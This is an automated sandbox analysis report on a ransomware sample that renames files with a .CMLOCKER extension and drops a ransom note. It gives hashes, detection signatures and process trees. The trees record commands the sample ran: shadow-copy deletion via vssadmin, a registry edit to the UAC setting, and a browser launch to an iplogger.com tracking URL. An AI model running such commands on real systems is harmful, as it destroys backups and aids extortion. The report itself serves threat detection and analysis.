Analysis
-
max time kernel
100s -
max time network
103s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
19/10/2022, 07:11
Static task
static1
Behavioral task
behavioral1
Sample
5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe
Resource
win10v2004-20220812-en
General
-
Target
5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe
-
Size
27KB
-
MD5
f6d05f1f65b85eb1228f6524bb3773e8
-
SHA1
2c1a3b5de5d9e34e20fcf39671b4359abd38507c
-
SHA256
5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31
-
SHA512
b8365ac6ef36e8bf133797533cae01b0c1a9646fa87949d28235553e51f7cec3c6ebf77c9eb0764fc43c5e47283e9c579b2b16308adb191cba83ef26cbfa84e5
-
SSDEEP
384:+JC/8iqrKZgU6uMKJNakkTiHG8eZXVb0/ze29j1W4Tv:oCUiq4NyVb0/zt3
Malware Config
Extracted
C:\Users\Admin\Links\HELP_DECRYPT_YOUR_FILES.txt
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" reg.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\MountSkip.crw => C:\Users\Admin\Pictures\MountSkip.crw.CMLOCKER 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe File renamed C:\Users\Admin\Pictures\RenameUndo.crw => C:\Users\Admin\Pictures\RenameUndo.crw.CMLOCKER 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe File renamed C:\Users\Admin\Pictures\ResizeExit.crw => C:\Users\Admin\Pictures\ResizeExit.crw.CMLOCKER 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe File renamed C:\Users\Admin\Pictures\ExitStop.crw => C:\Users\Admin\Pictures\ExitStop.crw.CMLOCKER 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\798001b9-daef-4380-b845-848980d67872.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221019091133.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1136 vssadmin.exe 4516 vssadmin.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3456 reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3160 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3320 msedge.exe 3320 msedge.exe 228 msedge.exe 228 msedge.exe 4788 identity_helper.exe 4788 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 228 msedge.exe 228 msedge.exe 228 msedge.exe 228 msedge.exe 228 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeBackupPrivilege 3972 vssvc.exe Token: SeRestorePrivilege 3972 vssvc.exe Token: SeAuditPrivilege 3972 vssvc.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 228 msedge.exe 228 msedge.exe 228 msedge.exe 228 msedge.exe 3160 NOTEPAD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4956 wrote to memory of 4940 4956 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe 83 PID 4956 wrote to memory of 4940 4956 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe 83 PID 4956 wrote to memory of 4928 4956 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe 84 PID 4956 wrote to memory of 4928 4956 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe 84 PID 4940 wrote to memory of 3456 4940 cmd.exe 87 PID 4940 wrote to memory of 3456 4940 cmd.exe 87 PID 4928 wrote to memory of 1136 4928 cmd.exe 88 PID 4928 wrote to memory of 1136 4928 cmd.exe 88 PID 4956 wrote to memory of 4216 4956 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe 91 PID 4956 wrote to memory of 4216 4956 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe 91 PID 4216 wrote to memory of 4516 4216 cmd.exe 93 PID 4216 wrote to memory of 4516 4216 cmd.exe 93 PID 4956 wrote to memory of 228 4956 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe 96 PID 4956 wrote to memory of 228 4956 5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe 96 PID 228 wrote to memory of 432 228 msedge.exe 97 PID 228 wrote to memory of 432 228 msedge.exe 97 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 1240 228 msedge.exe 102 PID 228 wrote to memory of 3320 228 msedge.exe 103 PID 228 wrote to memory of 3320 228 msedge.exe 103 PID 228 wrote to memory of 1124 228 msedge.exe 105 PID 228 wrote to memory of 1124 228 msedge.exe 105 PID 228 wrote to memory of 1124 228 msedge.exe 105 PID 228 wrote to memory of 1124 228 msedge.exe 105 PID 228 wrote to memory of 1124 228 msedge.exe 105 PID 228 wrote to memory of 1124 228 msedge.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe"C:\Users\Admin\AppData\Local\Temp\5fef2acf0b0289500ddfcbcbe45c95973c37d30eecdb2f5f20894a5f5b43ef31.exe"1⤵
- Modifies extensions of user files
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f3⤵
- UAC bypass
- Modifies registry key
PID:3456
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c vssadmin.exe delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1136
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c vssadmin.exe delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4516
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/2De1W62⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa9d5e46f8,0x7ffa9d5e4708,0x7ffa9d5e47183⤵PID:432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1492 /prefetch:23⤵PID:1240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:3320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3032 /prefetch:83⤵PID:1124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:13⤵PID:4108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:13⤵PID:2568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4860 /prefetch:83⤵PID:2056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:13⤵PID:2244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4960 /prefetch:83⤵PID:1712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:13⤵PID:1672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:13⤵PID:536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:83⤵PID:2756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
PID:296 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff76ad85460,0x7ff76ad85470,0x7ff76ad854804⤵PID:3556
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3190694091464840371,1202352561652888743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4788
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3488
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4480
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt1⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:3160
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5110b0d153e74e1eb9c5f4cb5096b264c
SHA1ef4e4fb2db7343ecb15319248c655bde589e1485
SHA256a15c383520d2ea6efbca8af67123e7df64740fdd0633929e57063e780c3f51c3
SHA5127f9003b337c583f00ceb8217dde040dc947c2df75510e3b9471d7d03035258b513d7f4242c01b22fdcc821530aaf8826251b804c830823dd466ff692258f21ac